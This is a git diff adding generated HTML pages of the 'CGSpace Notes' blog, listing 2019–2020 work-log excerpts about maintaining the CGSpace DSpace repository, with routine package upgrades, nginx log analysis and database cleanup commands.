+<li>Replace Marissa van Epp for Rhys Bucknall in the CCAFS groups on CGSpace because Marissa no longer works at CCAFS</li>
+<li>The AReS Explorer hasn&rsquo;t updated its index since 2020-08-22 when I last forced it
+<ul>
+<li>I restarted it again now and told Moayad that the automatic indexing isn&rsquo;t working</li>
+</ul>
+</li>
+<li>Add <code>Alliance of Bioversity International and CIAT</code> to affiliations on CGSpace</li>
+<li>Abenet told me that the general search text on AReS doesn&rsquo;t get reset when you use the &ldquo;Reset Filters&rdquo; button
+<ul>
+<li>I filed a bug on OpenRXV: <a href="https://github.com/ilri/OpenRXV/issues/39">https://github.com/ilri/OpenRXV/issues/39</a></li>
+</ul>
+</li>
+<li>I filed an issue on OpenRXV to make some minor edits to the admin UI: <a href="https://github.com/ilri/OpenRXV/issues/40">https://github.com/ilri/OpenRXV/issues/40</a></li>
+</ul>
+  <a href='https://alanorth.github.io/cgspace-notes/2020-09/'>Read more →</a>
+</article> 
+
+
+
+
+
+
+<article class="blog-post">
+  <header>
+    <h2 class="blog-post-title" dir="auto"><a href="https://alanorth.github.io/cgspace-notes/2020-08/">August, 2020</a></h2>
+    <p class="blog-post-meta"><time datetime="2020-08-02T15:35:54+03:00">Sun Aug 02, 2020</time> by Alan Orth in 
+<span class="fas fa-folder" aria-hidden="true"></span>&nbsp;<a href="/categories/notes/" rel="category tag">Notes</a>
+
+
+</p>
+  </header>
+  <h2 id="2020-08-02">2020-08-02</h2>
+<ul>
+<li>I spent a few days working on a Java-based curation task to tag items with ISO 3166-1 Alpha2 country codes based on their <code>cg.coverage.country</code> text values
+<ul>
+<li>It looks up the names in ISO 3166-1 first, and then in our CGSpace countries mapping (which has five or so of Peter&rsquo;s preferred &ldquo;display&rdquo; country names)</li>
+<li>It implements a &ldquo;force&rdquo; mode too that will clear existing country codes and re-tag everything</li>
+<li>It is class based so I can easily add support for other vocabularies, and the technique could even be used for organizations with mappings to ROR and Clarisa&hellip;</li>
+</ul>
+</li>
+</ul>
+  <a href='https://alanorth.github.io/cgspace-notes/2020-08/'>Read more →</a>
+</article> 
+
+
+
+
+
+
+<article class="blog-post">
+  <header>
+    <h2 class="blog-post-title" dir="auto"><a href="https://alanorth.github.io/cgspace-notes/2020-07/">July, 2020</a></h2>
+    <p class="blog-post-meta"><time datetime="2020-07-01T10:53:54+03:00">Wed Jul 01, 2020</time> by Alan Orth in 
+<span class="fas fa-folder" aria-hidden="true"></span>&nbsp;<a href="/categories/notes/" rel="category tag">Notes</a>
+
+
+</p>
+  </header>
+  <h2 id="2020-07-01">2020-07-01</h2>
+<ul>
+<li>A few users noticed that CGSpace wasn&rsquo;t loading items today, item pages seem blank
+<ul>
+<li>I looked at the PostgreSQL locks but they don&rsquo;t seem unusual</li>
+<li>I guess this is the same &ldquo;blank item page&rdquo; issue that we had a few times in 2019 that we never solved</li>
+<li>I restarted Tomcat and PostgreSQL and the issue was gone</li>
+</ul>
+</li>
+<li>Since I was restarting Tomcat anyways I decided to redeploy the latest changes from the <code>5_x-prod</code> branch and I added a note about COVID-19 items to the CGSpace frontpage at Peter&rsquo;s request</li>
+</ul>
+  <a href='https://alanorth.github.io/cgspace-notes/2020-07/'>Read more →</a>
+</article> 
+
+
+
+
+
+
+<article class="blog-post">
+  <header>
+    <h2 class="blog-post-title" dir="auto"><a href="https://alanorth.github.io/cgspace-notes/2020-06/">June, 2020</a></h2>
+    <p class="blog-post-meta"><time datetime="2020-06-01T13:55:39+03:00">Mon Jun 01, 2020</time> by Alan Orth in 
+<span class="fas fa-folder" aria-hidden="true"></span>&nbsp;<a href="/categories/notes/" rel="category tag">Notes</a>
+
+
+</p>
+  </header>
+  <h2 id="2020-06-01">2020-06-01</h2>
+<ul>
+<li>I tried to run the <code>AtomicStatisticsUpdateCLI</code> CUA migration script on DSpace Test (linode26) again and it is still going very slowly and has tons of errors like I noticed yesterday
+<ul>
+<li>I sent Atmire the dspace.log from today and told them to log into the server to debug the process</li>
+</ul>
+</li>
+<li>In other news, I checked the statistics API on DSpace 6 and it&rsquo;s working</li>
+<li>I tried to build the OAI registry on the freshly migrated DSpace 6 on DSpace Test and I get an error:</li>
+</ul>
+  <a href='https://alanorth.github.io/cgspace-notes/2020-06/'>Read more →</a>
+</article> 
+
+
+
+
+
+<nav class="blog-pagination">
+  
+  <a class="btn btn-outline-primary" href="/cgspace-notes/categories/notes/page/3/" rel="prev" role="button">Previous page</a>
+  <a class="btn btn-outline-primary" href="/cgspace-notes/categories/notes/page/5/" rel="next" role="button">Next page</a>
+  
+  
+  
+</nav>
+
+
+
+
+
+        </div> <!-- /.blog-main -->
+
+        <aside class="col-sm-3 ml-auto blog-sidebar">
+  
+
+  
+        <section class="sidebar-module">
+    <h4>Recent Posts</h4>
+    <ol class="list-unstyled">
+
+
+<li><a href="/cgspace-notes/2023-07/">July, 2023</a></li>
+
+<li><a href="/cgspace-notes/2023-06/">June, 2023</a></li>
+
+<li><a href="/cgspace-notes/2023-05/">May, 2023</a></li>
+
+<li><a href="/cgspace-notes/2023-04/">April, 2023</a></li>
+
+<li><a href="/cgspace-notes/2023-03/">March, 2023</a></li>
+
+    </ol>
+  </section>
+
+  
+
+  
+  <section class="sidebar-module">
+    <h4>Links</h4>
+    <ol class="list-unstyled">
+      
+      <li><a href="https://cgspace.cgiar.org">CGSpace</a></li>
+      
+      <li><a href="https://dspacetest.cgiar.org">DSpace Test</a></li>
+      
+      <li><a href="https://github.com/ilri/DSpace">CGSpace @ GitHub</a></li>
+      
+    </ol>
+  </section>
+  
+</aside>
+
+
+      </div> <!-- /.row -->
+    </div> <!-- /.container -->
+    
+
+    
+    <footer class="blog-footer">
+      <p dir="auto">
+      
+      Blog template created by <a href="https://twitter.com/mdo">@mdo</a>, ported to Hugo by <a href='https://twitter.com/mralanorth'>@mralanorth</a>.
+      
+      </p>
+      <p>
+      <a href="#">Back to top</a>
+      </p>
+    </footer>
+    
+
+  </body>
+
+</html>
diff --git a/docs/categories/notes/page/5/index.html b/docs/categories/notes/page/5/index.html
new file mode 100644
index 000000000..44dd15b3e
--- /dev/null
+++ b/docs/categories/notes/page/5/index.html
@@ -0,0 +1,477 @@
+<!DOCTYPE html>
+<html lang="en" >
+
+  <head>
+    <meta charset="utf-8">
+<meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">
+
+
+<meta property="og:title" content="Notes" />
+<meta property="og:description" content="Documenting day-to-day work on the [CGSpace](https://cgspace.cgiar.org) repository." />
+<meta property="og:type" content="website" />
+<meta property="og:url" content="https://alanorth.github.io/cgspace-notes/categories/notes/" />
+<meta property="og:updated_time" content="2023-07-01T17:17:31+03:00" />
+
+
+
+<meta name="twitter:card" content="summary"/>
+<meta name="twitter:title" content="Notes"/>
+<meta name="twitter:description" content="Documenting day-to-day work on the [CGSpace](https://cgspace.cgiar.org) repository."/>
+<meta name="generator" content="Hugo 0.112.3">
+
+
+    
+      
+    
+
+    <link rel="canonical" href="https://alanorth.github.io/cgspace-notes/categories/notes/">
+
+    <title>CGSpace Notes</title>
+
+    
+    <!-- combined, minified CSS -->
+    
+    <link href="https://alanorth.github.io/cgspace-notes/css/style.c6ba80bc50669557645abe05f86b73cc5af84408ed20f1551a267bc19ece8228.css" rel="stylesheet" integrity="sha256-xrqAvFBmlVdkWr4F&#43;GtzzFr4RAjtIPFVGiZ7wZ7Ogig=" crossorigin="anonymous">
+    
+
+    <!-- minified Font Awesome for SVG icons -->
+    
+    <script defer src="https://alanorth.github.io/cgspace-notes/js/fontawesome.min.f5072c55a0721857184db93a50561d7dc13975b4de2e19db7f81eb5f3fa57270.js" integrity="sha256-9QcsVaByGFcYTbk6UFYdfcE5dbTeLhnbf4HrXz&#43;lcnA=" crossorigin="anonymous"></script>
+
+    <!-- RSS 2.0 feed -->
+    <link rel="alternate" type="application/rss+xml" href="https://alanorth.github.io/cgspace-notes/categories/notes/index.xml" title="CGSpace Notes" />
+    
+
+    
+
+  </head>
+
+  <body>
+
+    
+    <div class="blog-masthead">
+      <div class="container">
+        <nav class="nav blog-nav">
+          <a class="nav-link " href="https://alanorth.github.io/cgspace-notes/">Home</a>
+        </nav>
+      </div>
+    </div>
+    
+
+    
+    
+    <header class="blog-header">
+      <div class="container">
+        <h1 class="blog-title" dir="auto"><a href="https://alanorth.github.io/cgspace-notes/" rel="home">CGSpace Notes</a></h1>
+        <p class="lead blog-description" dir="auto">Documenting day-to-day work on the <a href="https://cgspace.cgiar.org">CGSpace</a> repository.</p>
+      </div>
+    </header>
+    
+    
+
+    
+    <div class="container">
+      <div class="row">
+        <div class="col-sm-8 blog-main">
+
+          
+
+
+
+
+
+
+<article class="blog-post">
+  <header>
+    <h2 class="blog-post-title" dir="auto"><a href="https://alanorth.github.io/cgspace-notes/2020-05/">May, 2020</a></h2>
+    <p class="blog-post-meta"><time datetime="2020-05-02T09:52:04+03:00">Sat May 02, 2020</time> by Alan Orth in 
+<span class="fas fa-folder" aria-hidden="true"></span>&nbsp;<a href="/categories/notes/" rel="category tag">Notes</a>
+
+
+</p>
+  </header>
+  <h2 id="2020-05-02">2020-05-02</h2>
+<ul>
+<li>Peter said that CTA is having problems submitting an item to CGSpace
+<ul>
+<li>Looking at the PostgreSQL stats it seems to be the same issue that Tezira was having last week, as I see the number of connections in &lsquo;idle in transaction&rsquo; and &lsquo;waiting for lock&rsquo; state are increasing again</li>
+<li>I see that CGSpace (linode18) is still using PostgreSQL JDBC driver version 42.2.11, and there were some bugs related to transactions fixed in 42.2.12 (which I had updated in the Ansible playbooks, but not deployed yet)</li>
+</ul>
+</li>
+</ul>
+  <a href='https://alanorth.github.io/cgspace-notes/2020-05/'>Read more →</a>
+</article> 
+
+
+
+
+
+
+<article class="blog-post">
+  <header>
+    <h2 class="blog-post-title" dir="auto"><a href="https://alanorth.github.io/cgspace-notes/2020-04/">April, 2020</a></h2>
+    <p class="blog-post-meta"><time datetime="2020-04-02T10:53:24+03:00">Thu Apr 02, 2020</time> by Alan Orth in 
+<span class="fas fa-folder" aria-hidden="true"></span>&nbsp;<a href="/categories/notes/" rel="category tag">Notes</a>
+
+
+</p>
+  </header>
+  <h2 id="2020-04-02">2020-04-02</h2>
+<ul>
+<li>Maria asked me to update Charles Staver&rsquo;s ORCID iD in the submission template and on CGSpace, as his name was lower case before, and now he has corrected it
+<ul>
+<li>I updated the fifty-eight existing items on CGSpace</li>
+</ul>
+</li>
+<li>Looking into the items Udana had asked about last week that were missing Altmetric donuts:
+<ul>
+<li><a href="https://hdl.handle.net/10568/103225">The first</a> is still missing its DOI, so I added it and <a href="https://twitter.com/mralanorth/status/1245632619661766657">tweeted its handle</a> (after a few hours there was a donut with score 222)</li>
+<li><a href="https://hdl.handle.net/10568/106899">The second item</a> now has a donut with score 2 since I <a href="https://twitter.com/mralanorth/status/1243158045540134913">tweeted its handle</a> last week</li>
+<li><a href="https://hdl.handle.net/10568/107258">The third item</a> now has a donut with score 1 since I <a href="https://twitter.com/mralanorth/status/1243158786392625153">tweeted it</a> last week</li>
+</ul>
+</li>
+<li>On the same note, the <a href="https://hdl.handle.net/10568/106573">one item</a> Abenet pointed out last week now has a donut with score of 104 after I <a href="https://twitter.com/mralanorth/status/1243163710241345536">tweeted it</a> last week</li>
+</ul>
+  <a href='https://alanorth.github.io/cgspace-notes/2020-04/'>Read more →</a>
+</article> 
+
+
+
+
+
+
+<article class="blog-post">
+  <header>
+    <h2 class="blog-post-title" dir="auto"><a href="https://alanorth.github.io/cgspace-notes/2020-03/">March, 2020</a></h2>
+    <p class="blog-post-meta"><time datetime="2020-03-02T12:31:30+02:00">Mon Mar 02, 2020</time> by Alan Orth in 
+<span class="fas fa-folder" aria-hidden="true"></span>&nbsp;<a href="/categories/notes/" rel="category tag">Notes</a>
+
+
+</p>
+  </header>
+  <h2 id="2020-03-02">2020-03-02</h2>
+<ul>
+<li>Update <a href="https://github.com/ilri/dspace-statistics-api">dspace-statistics-api</a> for DSpace 6+ UUIDs
+<ul>
+<li>Tag version 1.2.0 on GitHub</li>
+</ul>
+</li>
+<li>Test migrating legacy Solr statistics to UUIDs with the as-of-yet unreleased <a href="https://github.com/DSpace/DSpace/commit/184f2b2153479045fba6239342c63e7f8564b8b6#diff-0350ce2e13b28d5d61252b7a8f50a059">SolrUpgradePre6xStatistics.java</a>
+<ul>
+<li>You need to download this into the DSpace 6.x source and compile it</li>
+</ul>
+</li>
+</ul>
+  <a href='https://alanorth.github.io/cgspace-notes/2020-03/'>Read more →</a>
+</article> 
+
+
+
+
+
+
+<article class="blog-post">
+  <header>
+    <h2 class="blog-post-title" dir="auto"><a href="https://alanorth.github.io/cgspace-notes/2020-02/">February, 2020</a></h2>
+    <p class="blog-post-meta"><time datetime="2020-02-02T11:56:30+02:00">Sun Feb 02, 2020</time> by Alan Orth in 
+<span class="fas fa-folder" aria-hidden="true"></span>&nbsp;<a href="/categories/notes/" rel="category tag">Notes</a>
+
+
+</p>
+  </header>
+  <h2 id="2020-02-02">2020-02-02</h2>
+<ul>
+<li>Continue working on porting CGSpace&rsquo;s DSpace 5 code to DSpace 6.3 that I started yesterday
+<ul>
+<li>Sign up for an account with MaxMind so I can get the GeoLite2-City.mmdb database</li>
+<li>I still need to wire up the API credentials and cron job into the Ansible infrastructure playbooks</li>
+<li>Fix some minor issues in the config and XMLUI themes, like removing Atmire stuff</li>
+<li>The code finally builds and runs with a fresh install</li>
+</ul>
+</li>
+</ul>
+  <a href='https://alanorth.github.io/cgspace-notes/2020-02/'>Read more →</a>
+</article> 
+
+
+
+
+
+
+<article class="blog-post">
+  <header>
+    <h2 class="blog-post-title" dir="auto"><a href="https://alanorth.github.io/cgspace-notes/2020-01/">January, 2020</a></h2>
+    <p class="blog-post-meta"><time datetime="2020-01-06T10:48:30+02:00">Mon Jan 06, 2020</time> by Alan Orth in 
+<span class="fas fa-folder" aria-hidden="true"></span>&nbsp;<a href="/categories/notes/" rel="category tag">Notes</a>
+
+
+</p>
+  </header>
+  <h2 id="2020-01-06">2020-01-06</h2>
+<ul>
+<li>Open <a href="https://tracker.atmire.com/tickets-cgiar-ilri/view-ticket?id=706">a ticket</a> with Atmire to request a quote for the upgrade to DSpace 6</li>
+<li>Last week Altmetric responded about the <a href="https://hdl.handle.net/10568/97087">item</a> that had a lower score than than its DOI
+<ul>
+<li>The score is now linked to the DOI</li>
+<li>Another <a href="https://hdl.handle.net/10568/91278">item</a> that had the same problem in 2019 has now also linked to the score for its DOI</li>
+<li>Another <a href="https://hdl.handle.net/10568/81236">item</a> that had the same problem in 2019 has also been fixed</li>
+</ul>
+</li>
+</ul>
+<h2 id="2020-01-07">2020-01-07</h2>
+<ul>
+<li>Peter Ballantyne highlighted one more WLE <a href="https://hdl.handle.net/10568/101286">item</a> that is missing the Altmetric score that its DOI has
+<ul>
+<li>The DOI has a score of 259, but the Handle has no score at all</li>
+<li>I <a href="https://twitter.com/mralanorth/status/1214471427157626881">tweeted</a> the CGSpace repository link</li>
+</ul>
+</li>
+</ul>
+  <a href='https://alanorth.github.io/cgspace-notes/2020-01/'>Read more →</a>
+</article> 
+
+
+
+
+
+
+<article class="blog-post">
+  <header>
+    <h2 class="blog-post-title" dir="auto"><a href="https://alanorth.github.io/cgspace-notes/2019-12/">December, 2019</a></h2>
+    <p class="blog-post-meta"><time datetime="2019-12-01T11:22:30+02:00">Sun Dec 01, 2019</time> by Alan Orth in 
+<span class="fas fa-folder" aria-hidden="true"></span>&nbsp;<a href="/categories/notes/" rel="category tag">Notes</a>
+
+
+</p>
+  </header>
+  <h2 id="2019-12-01">2019-12-01</h2>
+<ul>
+<li>Upgrade CGSpace (linode18) to Ubuntu 18.04:
+<ul>
+<li>Check any packages that have residual configs and purge them:</li>
+<li><!-- raw HTML omitted --># dpkg -l | grep -E &lsquo;^rc&rsquo; | awk &lsquo;{print $2}&rsquo; | xargs dpkg -P<!-- raw HTML omitted --></li>
+<li>Make sure all packages are up to date and the package manager is up to date, then reboot:</li>
+</ul>
+</li>
+</ul>
+<pre tabindex="0"><code># apt update &amp;&amp; apt full-upgrade
+# apt-get autoremove &amp;&amp; apt-get autoclean
+# dpkg -C
+# reboot
+</code></pre>
+  <a href='https://alanorth.github.io/cgspace-notes/2019-12/'>Read more →</a>
+</article> 
+
+
+
+
+
+
+<article class="blog-post">
+  <header>
+    <h2 class="blog-post-title" dir="auto"><a href="https://alanorth.github.io/cgspace-notes/2019-11/">November, 2019</a></h2>
+    <p class="blog-post-meta"><time datetime="2019-11-04T12:20:30+02:00">Mon Nov 04, 2019</time> by Alan Orth in 
+<span class="fas fa-folder" aria-hidden="true"></span>&nbsp;<a href="/categories/notes/" rel="category tag">Notes</a>
+
+
+</p>
+  </header>
+  <h2 id="2019-11-04">2019-11-04</h2>
+<ul>
+<li>Peter noticed that there were 5.2 million hits on CGSpace in 2019-10 according to the Atmire usage statistics
+<ul>
+<li>I looked in the nginx logs and see 4.6 million in the access logs, and 1.2 million in the API logs:</li>
+</ul>
+</li>
+</ul>
+<pre tabindex="0"><code># zcat --force /var/log/nginx/*access.log.*.gz | grep -cE &#34;[0-9]{1,2}/Oct/2019&#34;
+4671942
+# zcat --force /var/log/nginx/{rest,oai,statistics}.log.*.gz | grep -cE &#34;[0-9]{1,2}/Oct/2019&#34;
+1277694
+</code></pre><ul>
+<li>So 4.6 million from XMLUI and another 1.2 million from API requests</li>
+<li>Let&rsquo;s see how many of the REST API requests were for bitstreams (because they are counted in Solr stats):</li>
+</ul>
+<pre tabindex="0"><code># zcat --force /var/log/nginx/rest.log.*.gz | grep -c -E &#34;[0-9]{1,2}/Oct/2019&#34;
+1183456 
+# zcat --force /var/log/nginx/rest.log.*.gz | grep -E &#34;[0-9]{1,2}/Oct/2019&#34; | grep -c -E &#34;/rest/bitstreams&#34;
+106781
+</code></pre>
+  <a href='https://alanorth.github.io/cgspace-notes/2019-11/'>Read more →</a>
+</article> 
+
+
+
+
+
+
+<article class="blog-post">
+  <header>
+    <h2 class="blog-post-title" dir="auto"><a href="https://alanorth.github.io/cgspace-notes/2019-10/">October, 2019</a></h2>
+    <p class="blog-post-meta"><time datetime="2019-10-01T13:20:51+03:00">Tue Oct 01, 2019</time> by Alan Orth in 
+<span class="fas fa-folder" aria-hidden="true"></span>&nbsp;<a href="/categories/notes/" rel="category tag">Notes</a>
+
+
+</p>
+  </header>
+  2019-10-01 Udana from IWMI asked me for a CSV export of their community on CGSpace I exported it, but a quick run through the csv-metadata-quality tool shows that there are some low-hanging fruits we can fix before I send him the data I will limit the scope to the titles, regions, subregions, and river basins for now to manually fix some non-breaking spaces (U+00A0) there that would otherwise be removed by the csv-metadata-quality script&rsquo;s &ldquo;unneccesary Unicode&rdquo; fix: $ csvcut -c &#39;id,dc.
+  <a href='https://alanorth.github.io/cgspace-notes/2019-10/'>Read more →</a>
+</article> 
+
+
+
+
+
+
+<article class="blog-post">
+  <header>
+    <h2 class="blog-post-title" dir="auto"><a href="https://alanorth.github.io/cgspace-notes/2019-09/">September, 2019</a></h2>
+    <p class="blog-post-meta"><time datetime="2019-09-01T10:17:51+03:00">Sun Sep 01, 2019</time> by Alan Orth in 
+<span class="fas fa-folder" aria-hidden="true"></span>&nbsp;<a href="/categories/notes/" rel="category tag">Notes</a>
+
+
+</p>
+  </header>
+  <h2 id="2019-09-01">2019-09-01</h2>
+<ul>
+<li>Linode emailed to say that CGSpace (linode18) had a high rate of outbound traffic for several hours this morning</li>
+<li>Here are the top ten IPs in the nginx XMLUI and REST/OAI logs this morning:</li>
+</ul>
+<pre tabindex="0"><code># zcat --force /var/log/nginx/access.log /var/log/nginx/access.log.1 | grep -E &#34;01/Sep/2019:0&#34; | awk &#39;{print $1}&#39; | sort | uniq -c | sort -n | tail -n 10
+    440 17.58.101.255
+    441 157.55.39.101
+    485 207.46.13.43
+    728 169.60.128.125
+    730 207.46.13.108
+    758 157.55.39.9
+    808 66.160.140.179
+    814 207.46.13.212
+   2472 163.172.71.23
+   6092 3.94.211.189
+# zcat --force /var/log/nginx/rest.log /var/log/nginx/rest.log.1 /var/log/nginx/oai.log /var/log/nginx/oai.log.1 | grep -E &#34;01/Sep/2019:0&#34; | awk &#39;{print $1}&#39; | sort | uniq -c | sort -n | tail -n 10
+     33 2a01:7e00::f03c:91ff:fe16:fcb
+     57 3.83.192.124
+     57 3.87.77.25
+     57 54.82.1.8
+    822 2a01:9cc0:47:1:1a:4:0:2
+   1223 45.5.184.72
+   1633 172.104.229.92
+   5112 205.186.128.185
+   7249 2a01:7e00::f03c:91ff:fe18:7396
+   9124 45.5.186.2
+</code></pre>
+  <a href='https://alanorth.github.io/cgspace-notes/2019-09/'>Read more →</a>
+</article> 
+
+
+
+
+
+
+<article class="blog-post">
+  <header>
+    <h2 class="blog-post-title" dir="auto"><a href="https://alanorth.github.io/cgspace-notes/2019-08/">August, 2019</a></h2>
+    <p class="blog-post-meta"><time datetime="2019-08-03T12:39:51+03:00">Sat Aug 03, 2019</time> by Alan Orth in 
+<span class="fas fa-folder" aria-hidden="true"></span>&nbsp;<a href="/categories/notes/" rel="category tag">Notes</a>
+
+
+</p>
+  </header>
+  <h2 id="2019-08-03">2019-08-03</h2>
+<ul>
+<li>Look at Bioversity&rsquo;s latest migration CSV and now I see that Francesco has cleaned up the extra columns and the newline at the end of the file, but many of the column headers have an extra space in the name&hellip;</li>
+</ul>
+<h2 id="2019-08-04">2019-08-04</h2>
+<ul>
+<li>Deploy ORCID identifier updates requested by Bioversity to CGSpace</li>
+<li>Run system updates on CGSpace (linode18) and reboot it
+<ul>
+<li>Before updating it I checked Solr and verified that all statistics cores were loaded properly&hellip;</li>
+<li>After rebooting, all statistics cores were loaded&hellip; wow, that&rsquo;s lucky.</li>
+</ul>
+</li>
+<li>Run system updates on DSpace Test (linode19) and reboot it</li>
+</ul>
+  <a href='https://alanorth.github.io/cgspace-notes/2019-08/'>Read more →</a>
+</article> 
+
+
+
+
+
+<nav class="blog-pagination">
+  
+  <a class="btn btn-outline-primary" href="/cgspace-notes/categories/notes/page/4/" rel="prev" role="button">Previous page</a>
+  <a class="btn btn-outline-primary" href="/cgspace-notes/categories/notes/page/6/" rel="next" role="button">Next page</a>
+  
+  
+  
+</nav>
+
+
+
+
+
+        </div> <!-- /.blog-main -->
+
+        <aside class="col-sm-3 ml-auto blog-sidebar">
+  
+
+  
+        <section class="sidebar-module">
+    <h4>Recent Posts</h4>
+    <ol class="list-unstyled">
+
+
+<li><a href="/cgspace-notes/2023-07/">July, 2023</a></li>
+
+<li><a href="/cgspace-notes/2023-06/">June, 2023</a></li>
+
+<li><a href="/cgspace-notes/2023-05/">May, 2023</a></li>
+
+<li><a href="/cgspace-notes/2023-04/">April, 2023</a></li>
+
+<li><a href="/cgspace-notes/2023-03/">March, 2023</a></li>
+
+    </ol>
+  </section>
+
+  
+
+  
+  <section class="sidebar-module">
+    <h4>Links</h4>
+    <ol class="list-unstyled">
+      
+      <li><a href="https://cgspace.cgiar.org">CGSpace</a></li>
+      
+      <li><a href="https://dspacetest.cgiar.org">DSpace Test</a></li>
+      
+      <li><a href="https://github.com/ilri/DSpace">CGSpace @ GitHub</a></li>
+      
+    </ol>
+  </section>
+  
+</aside>
+
+
+      </div> <!-- /.row -->
+    </div> <!-- /.container -->
+    
+
+    
+    <footer class="blog-footer">
+      <p dir="auto">
+      
+      Blog template created by <a href="https://twitter.com/mdo">@mdo</a>, ported to Hugo by <a href='https://twitter.com/mralanorth'>@mralanorth</a>.
+      
+      </p>
+      <p>
+      <a href="#">Back to top</a>
+      </p>
+    </footer>
+    
+
+  </body>
+
+</html>
diff --git a/docs/categories/notes/page/6/index.html b/docs/categories/notes/page/6/index.html
new file mode 100644
index 000000000..98e3c82e8
--- /dev/null
+++ b/docs/categories/notes/page/6/index.html
@@ -0,0 +1,473 @@
+<!DOCTYPE html>
+<html lang="en" >
+
+  <head>
+    <meta charset="utf-8">
+<meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">
+
+
+<meta property="og:title" content="Notes" />
+<meta property="og:description" content="Documenting day-to-day work on the [CGSpace](https://cgspace.cgiar.org) repository." />
+<meta property="og:type" content="website" />
+<meta property="og:url" content="https://alanorth.github.io/cgspace-notes/categories/notes/" />
+<meta property="og:updated_time" content="2023-07-01T17:17:31+03:00" />
+
+
+
+<meta name="twitter:card" content="summary"/>
+<meta name="twitter:title" content="Notes"/>
+<meta name="twitter:description" content="Documenting day-to-day work on the [CGSpace](https://cgspace.cgiar.org) repository."/>
+<meta name="generator" content="Hugo 0.112.3">
+
+
+    
+      
+    
+
+    <link rel="canonical" href="https://alanorth.github.io/cgspace-notes/categories/notes/">
+
+    <title>CGSpace Notes</title>
+
+    
+    <!-- combined, minified CSS -->
+    
+    <link href="https://alanorth.github.io/cgspace-notes/css/style.c6ba80bc50669557645abe05f86b73cc5af84408ed20f1551a267bc19ece8228.css" rel="stylesheet" integrity="sha256-xrqAvFBmlVdkWr4F&#43;GtzzFr4RAjtIPFVGiZ7wZ7Ogig=" crossorigin="anonymous">
+    
+
+    <!-- minified Font Awesome for SVG icons -->
+    
+    <script defer src="https://alanorth.github.io/cgspace-notes/js/fontawesome.min.f5072c55a0721857184db93a50561d7dc13975b4de2e19db7f81eb5f3fa57270.js" integrity="sha256-9QcsVaByGFcYTbk6UFYdfcE5dbTeLhnbf4HrXz&#43;lcnA=" crossorigin="anonymous"></script>
+
+    <!-- RSS 2.0 feed -->
+    <link rel="alternate" type="application/rss+xml" href="https://alanorth.github.io/cgspace-notes/categories/notes/index.xml" title="CGSpace Notes" />
+    
+
+    
+
+  </head>
+
+  <body>
+
+    
+    <div class="blog-masthead">
+      <div class="container">
+        <nav class="nav blog-nav">
+          <a class="nav-link " href="https://alanorth.github.io/cgspace-notes/">Home</a>
+        </nav>
+      </div>
+    </div>
+    
+
+    
+    
+    <header class="blog-header">
+      <div class="container">
+        <h1 class="blog-title" dir="auto"><a href="https://alanorth.github.io/cgspace-notes/" rel="home">CGSpace Notes</a></h1>
+        <p class="lead blog-description" dir="auto">Documenting day-to-day work on the <a href="https://cgspace.cgiar.org">CGSpace</a> repository.</p>
+      </div>
+    </header>
+    
+    
+
+    
+    <div class="container">
+      <div class="row">
+        <div class="col-sm-8 blog-main">
+
+          
+
+
+
+
+
+
+<article class="blog-post">
+  <header>
+    <h2 class="blog-post-title" dir="auto"><a href="https://alanorth.github.io/cgspace-notes/2019-07/">July, 2019</a></h2>
+    <p class="blog-post-meta"><time datetime="2019-07-01T12:13:51+03:00">Mon Jul 01, 2019</time> by Alan Orth in 
+<span class="fas fa-folder" aria-hidden="true"></span>&nbsp;<a href="/categories/notes/" rel="category tag">Notes</a>
+
+
+</p>
+  </header>
+  <h2 id="2019-07-01">2019-07-01</h2>
+<ul>
+<li>Create an &ldquo;AfricaRice books and book chapters&rdquo; collection on CGSpace for AfricaRice</li>
+<li>Last month Sisay asked why the following &ldquo;most popular&rdquo; statistics link for a range of months in 2018 works for the CIAT community on DSpace Test, but not on CGSpace:
+<ul>
+<li><a href="https://dspacetest.cgiar.org/handle/10568/35697/most-popular/item#simplefilter=custom&amp;time_filter_end_date=01%2F12%2F2018">DSpace Test</a></li>
+<li><a href="https://cgspace.cgiar.org/handle/10568/35697/most-popular/item#simplefilter=custom&amp;time_filter_end_date=01%2F12%2F2018">CGSpace</a></li>
+</ul>
+</li>
+<li>Abenet had another similar issue a few days ago when trying to find the stats for 2018 in the RTB community</li>
+</ul>
+  <a href='https://alanorth.github.io/cgspace-notes/2019-07/'>Read more →</a>
+</article> 
+
+
+
+
+
+
+<article class="blog-post">
+  <header>
+    <h2 class="blog-post-title" dir="auto"><a href="https://alanorth.github.io/cgspace-notes/2019-06/">June, 2019</a></h2>
+    <p class="blog-post-meta"><time datetime="2019-06-02T10:57:51+03:00">Sun Jun 02, 2019</time> by Alan Orth in 
+<span class="fas fa-folder" aria-hidden="true"></span>&nbsp;<a href="/categories/notes/" rel="category tag">Notes</a>
+
+
+</p>
+  </header>
+  <h2 id="2019-06-02">2019-06-02</h2>
+<ul>
+<li>Merge the <a href="https://github.com/ilri/DSpace/pull/425">Solr filterCache</a> and <a href="https://github.com/ilri/DSpace/pull/426">XMLUI ISI journal</a> changes to the <code>5_x-prod</code> branch and deploy on CGSpace</li>
+<li>Run system updates on CGSpace (linode18) and reboot it</li>
+</ul>
+<h2 id="2019-06-03">2019-06-03</h2>
+<ul>
+<li>Skype with Marie-Angélique and Abenet about <a href="https://agriculturalsemantics.github.io/cg-core/cgcore.html">CG Core v2</a></li>
+</ul>
+  <a href='https://alanorth.github.io/cgspace-notes/2019-06/'>Read more →</a>
+</article> 
+
+
+
+
+
+
+<article class="blog-post">
+  <header>
+    <h2 class="blog-post-title" dir="auto"><a href="https://alanorth.github.io/cgspace-notes/2019-05/">May, 2019</a></h2>
+    <p class="blog-post-meta"><time datetime="2019-05-01T07:37:43+03:00">Wed May 01, 2019</time> by Alan Orth in 
+<span class="fas fa-folder" aria-hidden="true"></span>&nbsp;<a href="/categories/notes/" rel="category tag">Notes</a>
+
+
+</p>
+  </header>
+  <h2 id="2019-05-01">2019-05-01</h2>
+<ul>
+<li>Help CCAFS with regenerating some item thumbnails after they uploaded new PDFs to some items on CGSpace</li>
+<li>A user on the dspace-tech mailing list offered some suggestions for troubleshooting the problem with the inability to delete certain items
+<ul>
+<li>Apparently if the item is in the <code>workflowitem</code> table it is submitted to a workflow</li>
+<li>And if it is in the <code>workspaceitem</code> table it is in the pre-submitted state</li>
+</ul>
+</li>
+<li>The item seems to be in a pre-submitted state, so I tried to delete it from there:</li>
+</ul>
+<pre tabindex="0"><code>dspace=# DELETE FROM workspaceitem WHERE item_id=74648;
+DELETE 1
+</code></pre><ul>
